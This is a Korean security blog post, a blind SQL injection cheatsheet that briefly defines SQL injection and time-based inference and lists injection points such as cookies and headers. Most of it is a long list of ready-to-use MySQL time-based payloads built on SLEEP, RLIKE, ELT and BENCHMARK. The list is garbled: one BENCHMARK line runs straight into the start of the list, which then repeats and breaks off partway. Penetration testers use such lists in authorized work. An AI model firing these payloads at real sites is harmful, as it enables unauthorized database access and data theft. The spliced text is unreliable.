Vulnerability Assessment/Web Application

Blind SQL Injection Cheatsheet (블라인드 SQL 인젝션 Cheatsheet)

DarkSoul.Story 2022. 2. 11. 22:46
반응형
정보통신기반 보호법에 의거하여 정당한 접근권한이 없거나 허용된 접근권한의 범위를 초과하여 정보통신망에 침해하는 행위 등은 관련 법률에 따라 처벌 받을 수 있습니다.

허가 받지 않은곳에서 테스트를 절대 금지하며, 악의적인 목적으로 이용할 시 발생할 수 있는 법적 책임은 사용자 자신에게 있음을 알립니다. 이는 해당 글을 열람할 때 동의하였다는 것을 의미합니다.

SQL Injection 이란 무엇인가?

SQL Injection은 응용 프로그램이 데이터베이스에 대해 수행하는 쿼리를 공격자가 방해할 수 있는 웹 애플리케이션 취약점이다. SQL Injection 취약점으로 인한 여 공격자는 일반적으로 검색할 수 없는 데이터를 볼 수 있으며, 여기에는 다른 사용자에게 속한 데이터 또는 응용 프로그램 자체에서 액세스 할 수 있는 기타 데이터가 포함될 수 있다. 더 나아가 공격자는 데이터를 수정하거나 삭제하여 애플리케이션의 콘텐츠나 동작을 지속적으로 변경할 수 있다.

Blind SQL Injection 이란 무엇인가?

Blind SQL Injection은 데이터베이스에 참 또는 거짓 질의를 하고 이에 대한 애플리케이션이 응답을 기반으로 답을 결정하는 SQL Injection의 한 유형이다.

Time Base SQL Injection 이란 무엇인가?

Time Based SQL Injection은 데이터베이스가 응답하기 전에 지정된 시간(초) 동안 대기하도록 하는 SQL 쿼리를 데이터베이스에 보내는 데 의존하는 추론적 SQL Injection의 기술이다. 응답 시간은 쿼리 결과가 TRUE인지 FALSE인지를 공격자에게 알려준다.

Payload List

Payload는 검색란, 이름 입력란, 날짜 선택란, 이메일 작성란, 비밀번호 (등록, 로그인, 비밀번호 재설정 등), 메뉴, 키워드 검색란, 결제, 쿠키, Cookie, User agent, Referer, X-Forwarded-For 등에 주입할 수 있다.

MySQL Blind SQL Injection : Time Based

0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
if(now()=sysdate(),sleep(5),0)
'XOR(if(now()=sysdate(),sleep(5),0))XOR'
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'
if(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/
if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/
if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"/
SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/
%2c(select%5*%5from%5(select(sleep(5)))a)
(select(0)from(select(sleep(5)))v)
(SELECT SLEEP(5))
'%2b(select*from(select(sleep(5)))a)%2b'
(select*from(select(sleep(5)))a)
1'%2b(select*from(select(sleep(5)))a)%2b'
,(select * from (select(sleep(5)))a)
desc%2c(select*from(select(sleep(5)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--
'+(select*from(select(sleep(5)))a)+'
(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"
(select(0)from(select(sleep(5)))v)%2f*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*%2f
(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*/
AND BLIND:
1 and sleep 5--
1 and sleep 5
1 and sleep(5)--
1 and sleep(5)
' and sleep 5--
' and sleep 5
' and sleep 5 and '1'='1
' and sleep(5) and '1'='1
' and sleep(5)--
' and sleep(5)
' AnD SLEEP(5) ANd '1
and sleep 5--
and sleep 5
and sleep(5)--
and sleep(5)
and SELECT SLEEP(5); #
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
 and sleep 5--
 and sleep 5
 and sleep(5)--
 and sleep(5)
 and SELECT SLEEP(5); #
' AND SLEEP(5)#
" AND SLEEP(5)#
') AND SLEEP(5)#
OR BLIND:
or sleep 5--
or sleep 5
or sleep(5)--
or sleep(5)
or SELECT SLEEP(5); #
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
 or sleep 5--
 or sleep 5
 or sleep(5)--
 or sleep(5)
 or SELECT SLEEP(5); #
' OR SLEEP(5)#
" OR SLEEP(5)#
') OR SLEEP(5)#

AND / OR를 대체할 수 있음
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('PBiy'='PBiy
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((1337=1337
))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337'='1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337'='1337
' AND (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337
') AND (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337' LIKE '1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337' LIKE '1337
%' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337%'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337' LIKE '1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337"="1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337"="1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337"="1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337"="1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337" LIKE "1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337" LIKE "1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337" LIKE "1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337" LIKE "1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337'='1337
') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337

RLIKE BLIND:
AND / OR를 대체할 수 있음
RLIKE SLEEP(5)--
' RLIKE SLEEP(5)--
' RLIKE SLEEP(5)-- 1337
" RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5) AND ('1337'='1337
')) RLIKE SLEEP(5) AND (('1337'='1337
'))) RLIKE SLEEP(5) AND ((('1337'='1337
) RLIKE SLEEP(5)-- 1337
) RLIKE SLEEP(5) AND (1337=1337
)) RLIKE SLEEP(5) AND ((1337=1337
))) RLIKE SLEEP(5) AND (((1337=1337
1 RLIKE SLEEP(5)
1 RLIKE SLEEP(5)-- 1337
1 RLIKE SLEEP(5)# 1337
) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
1 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(5))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
` WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' RLIKE SLEEP(5) AND '1337'='1337
') RLIKE SLEEP(5) AND ('1337' LIKE '1337
')) RLIKE SLEEP(5) AND (('1337' LIKE '1337
'))) RLIKE SLEEP(5) AND ((('1337' LIKE '1337
%' RLIKE SLEEP(5) AND '1337%'='1337
' RLIKE SLEEP(5) AND '1337' LIKE '1337
") RLIKE SLEEP(5) AND ("1337"="1337
")) RLIKE SLEEP(5) AND (("1337"="1337
"))) RLIKE SLEEP(5) AND ((("1337"="1337
" RLIKE SLEEP(5) AND "1337"="1337
") RLIKE SLEEP(5) AND ("1337" LIKE "1337
")) RLIKE SLEEP(5) AND (("1337" LIKE "1337
"))) RLIKE SLEEP(5) AND ((("1337" LIKE "1337
" RLIKE SLEEP(5) AND "1337" LIKE "1337
' RLIKE SLEEP(5) OR '1337'='1337
') WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
") WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
" WHERE 1337=1337 RLIKE SLEEP(5)-- 1337

ELT Blind:
AND / OR를 대체할 수 있음
' AND ELT(1337=1337,SLEEP(5))--
' AND ELT(1337=1337,SLEEP(5))-- 1337
" AND ELT(1337=1337,SLEEP(5))-- 1337
') AND ELT(1337=1337,SLEEP(5))-- 1337
') AND ELT(1337=1337,SLEEP(5)) AND ('1337'='1337
')) AND ELT(1337=1337,SLEEP(5)) AND (('1337'='1337
'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337'='1337
' AND ELT(1337=1337,SLEEP(5)) AND '1337'='1337
') AND ELT(1337=1337,SLEEP(5)) AND ('1337' LIKE '1337
')) AND ELT(1337=1337,SLEEP(5)) AND (('1337' LIKE '1337
'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337' LIKE '1337
) AND ELT(1337=1337,SLEEP(5))-- 1337
) AND ELT(1337=1337,SLEEP(5)) AND (1337=1337
)) AND ELT(1337=1337,SLEEP(5)) AND ((1337=1337
))) AND ELT(1337=1337,SLEEP(5)) AND (((1337=1337
1 AND ELT(1337=1337,SLEEP(5))
1 AND ELT(1337=1337,SLEEP(5))-- 1337
1 AND ELT(1337=1337,SLEEP(5))# 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
1`=`1` AND ELT(1337=1337,SLEEP(5)) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))|[1
%' AND ELT(1337=1337,SLEEP(5)) AND '1337%'='1337
' AND ELT(1337=1337,SLEEP(5)) AND '1337' LIKE '1337
") AND ELT(1337=1337,SLEEP(5)) AND ("1337"="1337
")) AND ELT(1337=1337,SLEEP(5)) AND (("1337"="1337
"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337"="1337
" AND ELT(1337=1337,SLEEP(5)) AND "1337"="1337
") AND ELT(1337=1337,SLEEP(5)) AND ("1337" LIKE "1337
")) AND ELT(1337=1337,SLEEP(5)) AND (("1337" LIKE "1337
"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(5)) AND "1337" LIKE "1337
' AND ELT(1337=1337,SLEEP(5)) OR '1337'='FMTE
') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
'||(SELECT 0x4c454f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||'
'||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||'
'+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+'
||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337

BENCHMARK:
AND / OR를 대체할 수 있음
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND =BENCHMARK(5000000,MD5(0x774c5341))--
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '1337
%' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337%'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337"="1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337"="1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337"="1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND "1337"="1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337" LIKE "1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337" LIKE "1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337" LIKE "1337
" AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND "1337" LIKE "1337
' AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND '1337'='13370'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
if(now()=sysdate(),sleep(5),0)
'XOR(if(now()=sysdate(),sleep(5),0))XOR'
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'
if(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/
if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/
if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"/
SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/
%2c(select%5*%5from%5(select(sleep(5)))a)
(select(0)from(select(sleep(5)))v)
(SELECT SLEEP(5))
'%2b(select*from(select(sleep(5)))a)%2b'
(select*from(select(sleep(5)))a)
1'%2b(select*from(select(sleep(5)))a)%2b'
,(select * from (select(sleep(5)))a)
desc%2c(select*from(select(sleep(5)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--
'+(select*from(select(sleep(5)))a)+'
(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"
(select(0)from(select(sleep(5)))v)%2f*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*%2f
(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*/
AND BLIND:
1 and sleep 5--
1 and sleep 5
1 and sleep(5)--
1 and sleep(5)
' and sleep 5--
' and sleep 5
' and sleep 5 and '1'='1
' and sleep(5) and '1'='1
' and sleep(5)--
' and sleep(5)
' AnD SLEEP(5) ANd '1
and sleep 5--
and sleep 5
and sleep(5)--
and sleep(5)
and SELECT SLEEP(5); #
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
 and sleep 5--
 and sleep 5
 and sleep(5)--
 and sleep(5)
 and SELECT SLEEP(5); #
' AND SLEEP(5)#
" AND SLEEP(5)#
') AND SLEEP(5)#
OR BLIND:
or sleep 5--
or sleep 5
or sleep(5)--
or sleep(5)
or SELECT SLEEP(5); #
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
 or sleep 5--
 or sleep 5
 or sleep(5)--
 or sleep(5)
 or SELECT SLEEP(5); #
' OR SLEEP(5)#
" OR SLEEP(5)#
') OR SLEEP(5)#

AND / OR를 대체할 수 있음
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('PBiy'='PBiy
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((1337=1337
))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337'='1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337'='1337
' AND (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337
') AND (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337' LIKE '1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337' LIKE '1337
%' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337%'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337' LIKE '1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337"="1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337"="1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337"="1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337"="1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337" LIKE "1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337" LIKE "1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337" LIKE "1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337" LIKE "1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337'='1337
') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337

RLIKE BLIND:
AND / OR를 대체할 수 있음
RLIKE SLEEP(5)--
' RLIKE SLEEP(5)--
' RLIKE SLEEP(5)-- 1337
" RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5) AND ('1337'='1337
')) RLIKE SLEEP(5) AND (('1337'='1337
'))) RLIKE SLEEP(5) AND ((('1337'='1337
) RLIKE SLEEP(5)-- 1337
) RLIKE SLEEP(5) AND (1337=1337
)) RLIKE SLEEP(5) AND ((1337=1337
))) RLIKE SLEEP(5) AND (((1337=1337
1 RLIKE SLEEP(5)
1 RLIKE SLEEP(5)-- 1337
1 RLIKE SLEEP(5)# 1337
) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
1 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(5))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
` WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' RLIKE SLEEP(5) AND '1337'='1337
') RLIKE SLEEP(5) AND ('1337' LIKE '1337
')) RLIKE SLEEP(5) AND (('1337' LIKE '1337
'))) RLIKE SLEEP(5) AND ((('1337' LIKE '1337
%' RLIKE SLEEP(5) AND '1337%'='1337
' RLIKE SLEEP(5) AND '1337' LIKE '1337
") RLIKE SLEEP(5) AND ("1337"="1337
")) RLIKE SLEEP(5) AND (("1337"="1337
"))) RLIKE SLEEP(5) AND ((("1337"="1337
" RLIKE SLEEP(5) AND "1337"="1337
") RLIKE SLEEP(5) AND ("1337" LIKE "1337
")) RLIKE SLEEP(5) AND (("1337" LIKE "1337
"))) RLIKE SLEEP(5) AND ((("1337" LIKE "1337
" RLIKE SLEEP(5) AND "1337" LIKE "1337
' RLIKE SLEEP(5) OR '1337'='1337
') WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
") WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
" WHERE 1337=1337 RLIKE SLEEP(5)-- 1337

ELT Blind:
AND / OR를 대체할 수 있음
' AND ELT(1337=1337,SLEEP(5))--
' AND ELT(1337=1337,SLEEP(5))-- 1337
" AND ELT(1337=1337,SLEEP(5))-- 1337
') AND ELT(1337=1337,SLEEP(5))-- 1337
') AND ELT(1337=1337,SLEEP(5)) AND ('1337'='1337
')) AND ELT(1337=1337,SLEEP(5)) AND (('1337'='1337
'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337'='1337
' AND ELT(1337=1337,SLEEP(5)) AND '1337'='1337
') AND ELT(1337=1337,SLEEP(5)) AND ('1337' LIKE '1337
')) AND ELT(1337=1337,SLEEP(5)) AND (('1337' LIKE '1337
'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337' LIKE '1337
) AND ELT(1337=1337,SLEEP(5))-- 1337
) AND ELT(1337=1337,SLEEP(5)) AND (1337=1337
)) AND ELT(1337=1337,SLEEP(5)) AND ((1337=1337
))) AND ELT(1337=1337,SLEEP(5)) AND (((1337=1337
1 AND ELT(1337=1337,SLEEP(5))
1 AND ELT(1337=1337,SLEEP(5))-- 1337
1 AND ELT(1337=1337,SLEEP(5))# 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
1`=`1` AND ELT(1337=1337,SLEEP(5)) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))|[1
%' AND ELT(1337=1337,SLEEP(5)) AND '1337%'='1337
' AND ELT(1337=1337,SLEEP(5)) AND '1337' LIKE '1337
") AND ELT(1337=1337,SLEEP(5)) AND ("1337"="1337
")) AND ELT(1337=1337,SLEEP(5)) AND (("1337"="1337
"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337"="1337
" AND ELT(1337=1337,SLEEP(5)) AND "1337"="1337
") AND ELT(1337=1337,SLEEP(5)) AND ("1337" LIKE "1337
")) AND ELT(1337=1337,SLEEP(5)) AND (("1337" LIKE "1337
"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(5)) AND "1337" LIKE "1337
' AND ELT(1337=1337,SLEEP(5)) OR '1337'='FMTE
') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
'||(SELECT 0x4c454f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||'
'||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||'
'+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+'
||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
